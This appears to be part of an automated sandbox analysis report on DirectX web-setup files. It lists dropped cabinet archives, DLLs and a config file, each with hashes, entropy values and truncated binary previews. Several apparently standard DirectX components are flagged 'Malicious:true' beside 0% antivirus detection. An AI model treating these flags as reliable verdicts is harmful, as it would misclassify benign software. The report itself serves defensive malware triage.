                                                                                              Preview:MSCF...........D................"..............#..............M...X.........O9.2..d3dx10_40.dll.`...X.....O9.2..D3DCompiler_40.dll.......%...O9p:..d3dx10_40_x86.cat.I...g.&...O9h8..d3dx10_40_x86.inf.i.....&...O9h8..d3dx10_40_x86_xp.inf.c.... &...O9h8..Nov2008_d3dx10_40_x86.inf....X.0..CK..T...{..J........D...$.....$.2.....&L+...u..Q.5#f...W].9cN...w..Qd...y.......9~.}..]u+tOMM...r.].a.O..f7#.\........m.l._a.[..,4Q.&KU...c.eq1))*.,V!S...)2...Y.*^a.Q..b........y_x.W..Q^J^.j..P..gB.*..<w....E_).$j..q.|y..{.'....1V-..N.bt..%...A.0K....u...O...K.u.F.H(u>.X.vbd.......)..Ltg)c.a..J..|.V).N.F`G.Lxk..Rf.-.<1b...0..y...*y!.g..F1Z.v..T..o......i.............!Jku.:..i...e.....Z.HR.0...6.....zk1..._.-.L....a).Gx.).........@6...........P.\....?`.....f...|.r......L9......S.T ........o:J.'.E`?..x..?...$........z.......,.<.'..D.j .....G...3...G;.......p...&@W...;....^........R .X.....L ............-...........'.r`7........)........=......r..j,e..j.)..........uX)..p.B...

                                                                                              C:\Windows\SysWOW64\directx\websetup\Nov2008_d3dx9_40_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1544836 bytes, 5 files, at 0x44 "d3dx9_40.dll" "d3dx9_40_x86.cat", flags 0x4, ID 7155, number 1, extra bytes 20 in head, 134 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1554004
                                                                                              Entropy (8bit):7.999645278979612
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:K3tdQkdeoPJLiej+pb7Q15LwQrpLeWvYMWbPBmcnILz+0Byna:2dvdeAweSBQPLwgpCWvYMQ5mcnIH+m
                                                                                              MD5:75556D89FDD442967A23993C9111D997
                                                                                              SHA1:003DE53653C0CC84F8C3D617D1F76FB475F1A7CB
                                                                                              SHA-256:863AC3438F57158D4F53900C6924BFDC132AB43A5AF57D4658E65842836B4FA1
                                                                                              SHA-512:6086114500DBBF4DB9D0A9C3F72732995BB9A3AB5C135EAD53143749B95651B37B64BE7A52CA09388DE90216FD00486FDFCFBC87D42D77FAC469F82B5290E06D
                                                                                              Malicious:true
                                                                                              Preview:MSCF............D................................#..................P.B.......O9.2..d3dx9_40.dll.....P.B...O9n:..d3dx9_40_x86.cat.......B...O9h8..d3dx9_40_x86.inf.,.....B...O9h8..d3dx9_40_x86_xp.inf.\.....B...O9h8..Nov2008_d3dx9_40_x86.inf..=.:.:..[.... .2......$Q.f...<....!Z.J.+...*ea..U.q....ha.x.y...........=.h!............X.{.<,.....?..b.):.[J{....^=mv:.i.e..}9s............F.QN.^+.).p...!9.4L..B.k ....F.}..R.. ..D%P4@...'2.$C..EU..:_... ..=.....2...Q...H|..2.hi....H3.*.%JA.O...s.n-..<.<..9;7p.wnxw,||.....du.......)..$3CN.'.)j..|...x.w..>..4.D..."..I.'.=.....$.7..m...J..F....0..F.XD..v....."*|2...A.H.R..b.()! .|..Hh`....Q.K...NH..9../^...|[!.)k...8._C/~D.W..K4.}.B.T.b.Kw..si..6.E.#6w......_.,.>6{r$X&:....s.w......k....h'5......3...0XOG.^.=..j....sFg.jO. t..?.S.l5?.t...s....`...]......'$LJ.........Z]h.. ..h.l.5b....F..0......m.....P.....n....Z.... <..7.@...,`@..#.i.r....... ......@....|....e/.pa...@Q.A..'.EL..7H..?^..C.........]i p..N7....:i.P.........

                                                                                              C:\Windows\SysWOW64\directx\websetup\Oct2006_d3dx9_31_x64.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1406942 bytes, 5 files, at 0x44 +A "d3dx9_31_x64.cat" +A "d3dx9_31.dll", flags 0x4, ID 6653, number 1, extra bytes 20 in head, 124 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1416110
                                                                                              Entropy (8bit):7.999689455720137
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:DapRo0d7USayTXsV6ZMwksqb7CL7eRS3OnQdPIKoQZvkGVOxtWcjxWO3ehFWG492:DU+0wyTXsMiw+OORhQRdZLdc1BehFV4g
                                                                                              MD5:EDBA7BC2A22F3186420C271B7291DCA3
                                                                                              SHA1:65483DB4269BE348528FD205239B811D775421CA
                                                                                              SHA-256:4F5CFFA56FD44F7775F12FC511A1E3F030C05AC78484F6866B12B82979067C22
                                                                                              SHA-512:90A9FDAD3D7F933DA8C3731E42D262034907D8088B85D7100BE46C57DEF02B436C31EB9FF144B9D67FD931F92A1677EC0CD762D9AAF066BB026F139499BA3A66
                                                                                              Malicious:true
                                                                                              Preview:MSCF.....w......D............................w...#..............|.............<5m. .d3dx9_31_x64.cat...<.......<5.. .d3dx9_31.dll.......<...<5.. .infinst.exe.....'.=...<5.. .d3dx9_31_x64.inf.&.....=...<5.. .oct2006_d3dx9_31_x64.inf...l.9..[.... .......$a.V...>.H.!D;..mw.U............u..J..kAE.-....Z..-..kZ..FFf.........w.......Z...UpO..\.>?D.uJ;..nq.....w.........6.......|.G&U....Z.*U!cZF.A!..&R.$......u........[(o.o..{...yr.0c..*R..:.*.&...b....?P.i....._..\....w..4z....)..z...d:..B.'|/....O.j..h..............G1.....|^l...2..'.J0*AT.H"..T...@].....|,.....;..9.RL...r...Z...}.....\j..*.UGZK.\ .t..K.-.... $.r.5...e...#...9@..%.X..`s.........o..O.`..5.&...........w.....P/;~ZA~&..D..Ao.z...GW.......$..+......_.R{...C....#?..5.`.....-.y.o/.a.[....[..x._.s....x9.~.N..|.kyU.............o.. .S...f...i....3...(,..SyKM1kdv...q.b<...e.{..K.....F...Z..d(s.....1.......v..K.H=H..%...=...~..m}.C......|..h.UV../.H+HS|...{.<...Q...3.P.U...Z.....O1>.:X.p..5

                                                                                              C:\Windows\SysWOW64\directx\websetup\Oct2006_d3dx9_31_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1121257 bytes, 5 files, at 0x44 +A "d3dx9_31_x86.cat" +A "d3dx9_31.dll", flags 0x4, ID 6911, number 1, extra bytes 20 in head, 75 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1130449
                                                                                              Entropy (8bit):7.9990817245216945
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:fd5gyP75nbAgKdWsTLSCs3BZnH50ve35Jxroo6DS:F5fP75nbt0STRZn9nxrb5
                                                                                              MD5:F778928C9EB950EF493857F76A5811AD
                                                                                              SHA1:EA82D97077534751297AE0848FB1672E8F21E51E
                                                                                              SHA-256:4891E2DEA9D1798F6A89308E58C61A38E612F8433301EA2376AE14C3DFCB3021
                                                                                              SHA-512:1F382A287FC6763B8E8D66825E8256DFB7D0DEAD6B6A6B51DD7C4A5C86D536CC7EF4128BE0CE495FE17C859018750072DC7B43E3476D1BA435F209CC4EB6D43F
                                                                                              Malicious:true
                                                                                              Preview:MSCF............D................................#..............K.............<5m. .d3dx9_31_x86.cat...$.......<5.. .d3dx9_31.dll.......$...<5.. .d3dx9_31_w9x.inf.......$...<5.. .d3dx9_31_x86.inf.......$...<5.. .oct2006_d3dx9_31_x86.inf.j5o.s>..CK..\....oh"....Fl..'.......i.*vC..... `..w...6.....`.....;..E..........l.w.3....Y,..+......yg.a.....$.`0...6...XZ4.FX..J...l.V..o;F^..lH....3'.f0..G.m..P.[>...G..j..c^....p.<OAO.N.q.Z.E...hk..H...'@../.B.....q`K...y"..-9.r.'.9...x.O.R.8.......c....`Gc..C....>......X.......|0c..tz......./....-.faa.0..<,.V.^X..B......:/...y...3...X.GZ..T......Bi[.KY.x..A...3.[...s..l..J..U..h.../2Z"7......k....yB.E^.r....T........K.....,...X..)..C...z4.....b......o..yv5.!5...CD`&.\.<0..P.y9..e..`{m8..K.:(.....w..la..@.++.N... .y6.m.......,.c...[lc....d..AM.6........ .P...uD.........m...........m.e.`9t..+..aa..@5.y}r.\..rJ.={9f...3...fO4.u.V6u-z.....t.n..*.A..0%.T....L'.[K...Uh....Ul....vum.........N.U..).)Q...x.RaPk5..X3z.e...

                                                                                              C:\Windows\SysWOW64\directx\websetup\Oct2006_xact_x64.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 176401 bytes, 6 files, at 0x44 +A "xact2_4_x64.cat" +A "x3daudio1_1.dll", flags 0x4, ID 8466, number 1, extra bytes 20 in head, 15 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):185569
                                                                                              Entropy (8bit):7.996440771278114
                                                                                              Encrypted:true
                                                                                              SSDEEP:3072:m3ZITAOIgaJqZazyaNuGKQb5aML7XTXM9+37VD5d58Oxz+oKG+ONa8bW9uMBowLB:iImMo2aHb0MvDn3jdhzWONFob
                                                                                              MD5:CC568D26B5B4CDA021D528CF75B21699
                                                                                              SHA1:DD47A33950C9E3A88DEFCAA7EA331FB1F1BBAB97
                                                                                              SHA-256:662D4E5D005CDBA02FABB0D7A68A7B48ECAFDEBE21718D892833D5C482E5ADD7
                                                                                              SHA-512:24B53BBD82DEC594D9909352D1F2AFE69B6F082DB99AAB3385826C4E8D22F5C075F3C5A24C8104DBEEF2D894980319AF141C65D768A51936C75092A846F3C8AA
                                                                                              Malicious:true
                                                                                              Preview:MSCF............D................!...............#..................! ........<5o. .xact2_4_x64.cat..E..! ....<5o. .x3daudio1_1.dll.....9e....<5.. .xactengine2_4.dll.....Q.....<5.. .infinst.exe.....i.....<5.. .oct2006_xact_x64.inf...........<5.. .xact2_4_x64.inf...~.x:..[.....0...R.P...O....5H"... .I.XA.D..MtT....A..MJ....$."=P).y.IB.EJ..".`4..f.{..n..Z.....|w..5@.!&. ..Gm..D..M.@.<[....9gea..8e..C.b_....... .....D".f.@......gP|..B...2......{.........'.3H..K.RU...B....{.......).....m.I@ ...Q]....(.'$..'...._4....J^.._......R)0i(b......_./.....80.@..H.H......?..%N.F.<.>...".gt.P..........'.....7R.@.....6.....P.V...X.od..$....Oy.......} "o.}...HWza..../.%..d..o.F..q...D+...)..."..C... .2.8..f....<..=N...c.Z4[v'.......f...i,.....P...s7...K'...:..A..bW.......S%v.##3...c..Q..+.$kQ..2.....,..=^../'.._!.D.......$.T.n..Z..'.@.2....O...:Y'...@...?./......"Ti2}...N..=.kq...x.T.?.Tq.?..?IB....N.x..=.CTl........V9y.sCay............D.Q.'.?.8..8.....<A......).$'..g

                                                                                              C:\Windows\SysWOW64\directx\websetup\Oct2006_xact_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 132057 bytes, 5 files, at 0x44 +A "xact2_4_x86.cat" +A "x3daudio1_1.dll", flags 0x4, ID 7347, number 1, extra bytes 20 in head, 9 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):141225
                                                                                              Entropy (8bit):7.994197909856769
                                                                                              Encrypted:true
                                                                                              SSDEEP:3072:s0cnkrYXa8cJVIajswPlOA//GNzLriX5MMP6:s0OkrcajIaw+neN+XaMy
                                                                                              MD5:4FD2B859952C008DE0542053B15BF0D1
                                                                                              SHA1:0800CEC84B51FC6362C871FAB87A09DB5C4AD6D4
                                                                                              SHA-256:F6B6EBC9C239C5263AAFAA63FD691DA5AA715E9C794D5FD663E86559D5C6AE56
                                                                                              SHA-512:D656C3BFE4593EA9084A5D09F0173C8F6B7D6229FC7E3F6757AC03089CFA94A7337BBEF0456785B79D777B976F5A8259056D2DDCFE0F74D78C304A02BCEE0AD8
                                                                                              Malicious:true
                                                                                              Preview:MSCF............D................................#..................! ........<5p. .xact2_4_x86.cat..;..! ....<5n. .x3daudio1_1.dll.....9[....<5.. .xactengine2_4.dll.W...Q.....<5.. .oct2006_xact_x86.inf...........<5.. .xact2_4_x86.inf....)l:..CK.|.\.........." .DE...N..!.*.....A.\....."*.x>...Q\<V.X.k.Q.W].u3bDWWQP.Bt.|.......~.....?'.twuUuuuUu..-^..=d~...z....".>.t...W...b..Q...^D...=T.B....PJ..5.:...t4@..Bg..j.{zR..]-O.'.....]pwG7G.......wA.".....bI.s.../..?g..nw....t.F..#.\......9...A........N...x...q.......R..p|<n.......$.!.T,....0.&.{...V]4@7.w...r..<..@[.w.z."..S?..J.F.a.c.. ...F. q.1{..Ov..`\..I./.B.../.N ./....~s.T*h.2....`...(.)B@}.!.........?.Z...r.9.;...n....D|_.p.,4.. ...........$|....b...Q.....r4.&N..w.,.O......$z.....F... ......A.....H2$#N......D.u%...%?...>._...DY.m..O.k.7Y....1..".......,h.......,l,..;.JgS0.....p.n....%......H.k.Hv.46.t.?.R8....x....F..Lq.... ..:...y......K..k..[..;...^[!.....F.P...}V5...}_7...q..z.b#...PFFEZ$].:.k......-

                                                                                              C:\Windows\SysWOW64\directx\websetup\SET1013.tmp

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):1801048
                                                                                              Entropy (8bit):6.400511251324513
                                                                                              Encrypted:false
                                                                                              SSDEEP:49152:RjnIXtNeOOOOOOOOOOOOOOOOOiWeXiWeXiWeXiWeXiWeXiWeXiWeXiWeXiWeXiWI:5IjmY
                                                                                              MD5:7672509436485121135C2A0E30B9E9FF
                                                                                              SHA1:F557022A9F42FE1303078093E389F21FB693C959
                                                                                              SHA-256:D7EA3CF1B9B639010005E503877026597A743D1068AE6A453CE77CC202796FEA
                                                                                              SHA-512:E46FF68C4A532017F8AB15B1E46565508F6285B72C7A1CBE964ED5E75320C8E14587D01FEE61B3966F43636BFE74CEBD21F7665B4A726281E771CF9230E69863
                                                                                              Malicious:true
                                                                                              Antivirus:
                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......?.,.{.BZ{.BZ{.BZr..Zh.BZ{.CZ.BZ...Zi.BZ...Zz.BZ...Z..BZ...ZQ.BZ...Zz.BZ...Zz.BZRich{.BZ........................PE..L....A.L...........!.....`...................p............................................@..........................m......d^......................d..X....p... ......................................@............................................text....^.......`.................. ..`.data....4...p.......d..............@....rsrc...............v..............@..@.reloc...-...p.......6..............@..B................................................................................................................................................................................................................................................................................................................................................................

                                                                                              C:\Windows\SysWOW64\directx\websetup\SETFF3.tmp

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):89944
                                                                                              Entropy (8bit):6.418506334480987
                                                                                              Encrypted:false
                                                                                              SSDEEP:1536:gtBqvGpPmOEll4RWxiF9G3ZnVdqkFKJuTJbHo0Xm+jN3i97ZTj4FWMD+ZJqsHPCL:gtAvG5mOEll4Roi2pVVFKJuTVtXVpS9y
                                                                                              MD5:0A23038EA472FFC938366EF4099D6635
                                                                                              SHA1:6499D741776DC4A446C22EA11085842155B34176
                                                                                              SHA-256:8F2C455C9271290DCDE2F68589CF825F9134BEECB7E8B7E2ECBCABEAB792280A
                                                                                              SHA-512:DCC1C2EA86FD3A7870CD0369FA42F63D493895C546DCDD492EE19079A0D0696D689BBFE7B686D4FA549841896A54E673FC4581B80783D7AA255DFAD765B9DC88
                                                                                              Malicious:true
                                                                                              Antivirus:
                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......NOd..............V..........u...eX......eX......eX......eX..`...eX......eX......Rich............PE..L....A.L...........!.........N.......p.......0......................................2.....@..........................$..y............p..h............H..X.......`... ................................=..@............................................text............................... ..`.data...<0...0......................@....rsrc...h....p.......,..............@..@.reloc...............4..............@..B................................................................................................................................................................................................................................................................................................................................................................................

                                                                                              C:\Windows\SysWOW64\directx\websetup\dsetup.dll (copy)

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):89944
                                                                                              Entropy (8bit):6.418506334480987
                                                                                              Encrypted:false
                                                                                              SSDEEP:1536:gtBqvGpPmOEll4RWxiF9G3ZnVdqkFKJuTJbHo0Xm+jN3i97ZTj4FWMD+ZJqsHPCL:gtAvG5mOEll4Roi2pVVFKJuTVtXVpS9y
                                                                                              MD5:0A23038EA472FFC938366EF4099D6635
                                                                                              SHA1:6499D741776DC4A446C22EA11085842155B34176
                                                                                              SHA-256:8F2C455C9271290DCDE2F68589CF825F9134BEECB7E8B7E2ECBCABEAB792280A
                                                                                              SHA-512:DCC1C2EA86FD3A7870CD0369FA42F63D493895C546DCDD492EE19079A0D0696D689BBFE7B686D4FA549841896A54E673FC4581B80783D7AA255DFAD765B9DC88
                                                                                              Malicious:true
                                                                                              Antivirus:
                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......NOd..............V..........u...eX......eX......eX......eX..`...eX......eX......Rich............PE..L....A.L...........!.........N.......p.......0......................................2.....@..........................$..y............p..h............H..X.......`... ................................=..@............................................text............................... ..`.data...<0...0......................@....rsrc...h....p.......,..............@..@.reloc...............4..............@..B................................................................................................................................................................................................................................................................................................................................................................................

                                                                                              C:\Windows\SysWOW64\directx\websetup\dsetup32.dll (copy)

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):1801048
                                                                                              Entropy (8bit):6.400511251324513
                                                                                              Encrypted:false
                                                                                              SSDEEP:49152:RjnIXtNeOOOOOOOOOOOOOOOOOiWeXiWeXiWeXiWeXiWeXiWeXiWeXiWeXiWeXiWI:5IjmY
                                                                                              MD5:7672509436485121135C2A0E30B9E9FF
                                                                                              SHA1:F557022A9F42FE1303078093E389F21FB693C959
                                                                                              SHA-256:D7EA3CF1B9B639010005E503877026597A743D1068AE6A453CE77CC202796FEA
                                                                                              SHA-512:E46FF68C4A532017F8AB15B1E46565508F6285B72C7A1CBE964ED5E75320C8E14587D01FEE61B3966F43636BFE74CEBD21F7665B4A726281E771CF9230E69863
                                                                                              Malicious:true
                                                                                              Antivirus:
                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......?.,.{.BZ{.BZ{.BZr..Zh.BZ{.CZ.BZ...Zi.BZ...Zz.BZ...Z..BZ...ZQ.BZ...Zz.BZ...Zz.BZRich{.BZ........................PE..L....A.L...........!.....`...................p............................................@..........................m......d^......................d..X....p... ......................................@............................................text....^.......`.................. ..`.data....4...p.......d..............@....rsrc...............v..............@..@.reloc...-...p.......6..............@..B................................................................................................................................................................................................................................................................................................................................................................

                                                                                              C:\Windows\SysWOW64\directx\websetup\dxupdate.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 91192 bytes, 3 files, at 0x44 "dxupdate.dll" "dxupdate.inf", flags 0x4, ID 3666, number 1, extra bytes 20 in head, 8 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):100360
                                                                                              Entropy (8bit):7.9900557178400815
                                                                                              Encrypted:true
                                                                                              SSDEEP:3072:lvknxJpNYAzRstaRkz0BwwnNbSa+vp5647S:FkZNXsERk6wwBSa+vnl2
                                                                                              MD5:4AFD7F5C0574A0EFD163740ECB142011
                                                                                              SHA1:3EBCA5343804FE94D50026DA91647442DA084302
                                                                                              SHA-256:6E39B3FDB6722EA8AA0DC8F46AE0D8BD6496DD0F5F56BAC618A0A7DD22D6CFB2
                                                                                              SHA-512:6F974ACEC7D6C1B6A423B28810B0840E77A9F9C1F9632C5CBA875BD895E076C7E03112285635CF633C2FA9A4D4E2F4A57437AE8DF88A7882184FF6685EE15F3F
                                                                                              Malicious:true
                                                                                              Preview:MSCF....8d......D...............R...........8d...#............................~>.%..dxupdate.dll.02........h=...dxupdate.inf.1...0.....~>.%..dxupdate.cif.T....'..CK.Z}.$.U....;..@.e!.#....G===.=+".?..+.s..l8....o.{....;.+..(...d,..HVd..,......(..[&H.........Y.Y..~..{.gv.vW.'.....^......^...}...1v....2.*.~.......y...a_.....^Z..V?H.Q..bo(..0.Ra...q(..`o....W.....4~...q.?...F.............].....~c...O7^..W..x.?...l.=.~$......'..o;.._.....'u.aK......=..X.........g........~.].[..+..\b._........p.=.....w...%..@.o-.....O2..w...~sn..D_:....G).../e.Q_/....=Y.x........p.0..^....w...A}..'..... ...P.7....3.av...?...Kl.......>t...O`..b.]....x..Y....._...x..}....@.....1.9.o....[.?.......)...g..'.1.i../.^.|..=........x...L.6`...>..,...K./....6...........A.#.?.8.|....?.|......w%K.>@..(.I...9.../....].....%v7.>.....-@.p....E........6...Kc..p?@.....8.|.p/..xg...7...^.(..7..X~?..........#...w...q..U....f.... ..?<.\...}.K.Z.,]+...../..-......e...aO....a9Y......Wg.

                                                                                              C:\Windows\SysWOW64\directx\websetup\filelist.dat

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Generic INItialization configuration [DXUpdate]
                                                                                              Category:dropped
                                                                                              Size (bytes):10910
                                                                                              Entropy (8bit):5.298492916268781
                                                                                              Encrypted:false
                                                                                              SSDEEP:192:8NV2ety7h+IZpt1eJ9NWzfxRaTwzxlWINXWgQ83HSbsO6ctIQbjQQZRJi6C+vP+6:8r2et2h+IZpt1eJ9NWjx4MzxlWINXWgq
                                                                                              MD5:7A83448F9110B8D6DE14B3C755B43F91
                                                                                              SHA1:B204E3B080CCE93C124FAFD3949839871382C904
                                                                                              SHA-256:C8C9283C824A57C1C1236F45DD51DBE9A59609076C636BBABFCAF187E4A10FF2
                                                                                              SHA-512:1620E3472D15525F6457F75AC986691AD37A1C2E0565031A34AB75BC5E9D1EC24B7F78A81EB64F1EE8A677F3C7F5D23151899643193788BC9E175BBCD0C61C5B
                                                                                              Malicious:false
                                                                                              Preview:[General]..Version=1..[DXUpdate]..Version=9,29,1962,0..Locale=en..GUID={44BBA855-CC51-11CF-AAFA-00AA00B6015C}..URL0=100360,dxupdate.cab..[DXUpdate_Apr2006_xinput_x86]..Version=4,9,0,904..Locale=en..GUID={44BBA855-CC51-11CF-AAFA-00AA00B6015C}..URL0=49218,Apr2006_xinput_x86.cab..[DXUpdate_Apr2006_xinput_x64]..Version=4,9,0,904..Locale=en..GUID={44BBA855-CC51-11CF-AAFA-00AA00B6015C}..URL0=90309,Apr2006_xinput_x64.cab..[DXUpdate_Aug2006_xinput_x86]..Version=4,9,0,904..Locale=en..GUID={44BBA855-CC51-11CF-AAFA-00AA00B6015C}..URL0=49266,Aug2006_xinput_x86.cab..[DXUpdate_Aug2006_xinput_x64]..Version=4,9,0,904..Locale=en..GUID={44BBA855-CC51-11CF-AAFA-00AA00B6015C}..URL0=90350,Aug2006_xinput_x64.cab..[DXUpdate_Dec2006_d3dx10_x86]..Version=4,9,0,904..Locale=en..GUID={44BBA855-CC51-11CF-AAFA-00AA00B6015C}..URL0=194952,Dec2006_d3dx10_00_x86.cab..[DXUpdate_Dec2006_d3dx10_x64]..Version=4,9,0,904..Locale=en..GUID={44BBA855-CC51-11CF-AAFA-00AA00B6015C}..URL0=216015,Dec2006_d3dx10_00_x64.cab..[DXUpdate

                                                                                              C:\Windows\msdownld.tmp\AS4431D3.tmp\dxupdate.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 91192 bytes, 3 files, at 0x44 "dxupdate.dll" "dxupdate.inf", flags 0x4, ID 3666, number 1, extra bytes 20 in head, 8 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):100360
                                                                                              Entropy (8bit):7.9900557178400815
                                                                                              Encrypted:true
                                                                                              SSDEEP:3072:lvknxJpNYAzRstaRkz0BwwnNbSa+vp5647S:FkZNXsERk6wwBSa+vnl2
                                                                                              MD5:4AFD7F5C0574A0EFD163740ECB142011
                                                                                              SHA1:3EBCA5343804FE94D50026DA91647442DA084302
                                                                                              SHA-256:6E39B3FDB6722EA8AA0DC8F46AE0D8BD6496DD0F5F56BAC618A0A7DD22D6CFB2
                                                                                              SHA-512:6F974ACEC7D6C1B6A423B28810B0840E77A9F9C1F9632C5CBA875BD895E076C7E03112285635CF633C2FA9A4D4E2F4A57437AE8DF88A7882184FF6685EE15F3F
                                                                                              Malicious:true
                                                                                              Preview:MSCF....8d......D...............R...........8d...#............................~>.%..dxupdate.dll.02........h=...dxupdate.inf.1...0.....~>.%..dxupdate.cif.T....'..CK.Z}.$.U....;..@.e!.#....G===.=+".?..+.s..l8....o.{....;.+..(...d,..HVd..,......(..[&H.........Y.Y..~..{.gv.vW.'.....^......^...}...1v....2.*.~.......y...a_.....^Z..V?H.Q..bo(..0.Ra...q(..`o....W.....4~...q.?...F.............].....~c...O7^..W..x.?...l.=.~$......'..o;.._.....'u.aK......=..X.........g........~.].[..+..\b._........p.=.....w...%..@.o-.....O2..w...~sn..D_:....G).../e.Q_/....=Y.x........p.0..^....w...A}..'..... ...P.7....3.av...?...Kl.......>t...O`..b.]....x..Y....._...x..}....@.....1.9.o....[.?.......)...g..'.1.i../.^.|..=........x...L.6`...>..,...K./....6...........A.#.?.8.|....?.|......w%K.>@..(.I...9.../....].....%v7.>.....-@.p....E........6...Kc..p?@.....8.|.p/..xg...7...^.(..7..X~?..........#...w...q..U....f.... ..?<.\...}.K.Z.,]+...../..-......e...aO....a9Y......Wg.

                                                                                              C:\Windows\msdownld.tmp\AS4493D8.tmp\Apr2006_xinput_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 40050 bytes, 4 files, at 0x44 +A "xinput1_1_x86.cat" +A "xinput1_1.dll", flags 0x4, ID 6338, number 1, extra bytes 20 in head, 3 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):49218
                                                                                              Entropy (8bit):7.962835058038329
                                                                                              Encrypted:false
                                                                                              SSDEEP:768:rrXN+lWp5tvn2v0JeuXfYYJDyRIvwde6hecBLdKd+d4RUJ6HwyQs34VvD4:3gl6tfTVXwcWuqe6htcaJyQW4VvD4
                                                                                              MD5:E207FB904E641246F3F7234DB74121FC
                                                                                              SHA1:1BE8C50C074699BDD9184714E9022B7A2F8BF928
                                                                                              SHA-256:3FDF63211B0DD38069A9C1DF74D7BC42742DE003CEF72AD1486AAA92D74546FA
                                                                                              SHA-512:ED95D53BC351C98C0322753265B0A21C98DF97D0E2FBBC58A6836BFF374B7540B0CEA21371CD4A7EAD654210A42E1F9809CAC6E4EAE2ECF0EF2B88E220DC37F7
                                                                                              Malicious:false
                                                                                              Preview:MSCF....r.......D...........................r....#.............................46f .xinput1_1_x86.cat............4.d .xinput1_1.dll............4.e .apr2006_xinput_x86.inf.....R......4.e .xinput1_1_x86.inf...G..>..CK..\SG.8|....&l....-n.6....(Z........"PH..,...+.G.V..b..V....Zm.Z..Xm..ZQ..E.{.......}....&L.g.9s....Jz?tp..N.;.]Y....!...b......t.c..'D%v[...8.8..........F.spf2y,.Gpe.w.......d...o.vs.........G...).bQ....cE%....."..GH.`"....D..B!..i.1..... ..0.. ..K# ...@*...C!M....R....SDq.c...b....#!6....b.....(/.`.....Q....(.!.pE....lB.a....L.M..[..E.........|...;.H!..".P.j........9..<.t.l....]5w.;...R.9qQx...@x..8.........$.1.az!.Z..?.rDP+...c..)U'J..E.H..j....%.......w.;..x.O...>........`0.A4..d.....dT...Q.3..y0.."..].x"...|.C.bs.,...`..h..#D..y.v..OM.1u{..C .X.N......+0....f2...3;...@...P......Z.......H.x.E<....A.-.4OA.Vi.f......."n\....b\...\M+.e.....k.N.q.`....%.@.../Q..V.e...s..."w.......KI........4.u.p..J^.V....D....t.0J...H.HMVg.d....B.v.]..)..

                                                                                              C:\Windows\msdownld.tmp\AS449A12.tmp\Apr2006_xinput_x64.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 81141 bytes, 5 files, at 0x44 +A "xinput1_1_x64.cat" +A "xinput1_1.dll", flags 0x4, ID 7457, number 1, extra bytes 20 in head, 5 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):90309
                                                                                              Entropy (8bit):7.986243949537019
                                                                                              Encrypted:false
                                                                                              SSDEEP:1536:/0CNqg1WzKHJUq/JSlvxToeSNOUp9BttldRL9zaMNez4fbI9YKztrIrm:/hIg1cEJUxvxlSNOUpfttldRL9zkzAI5
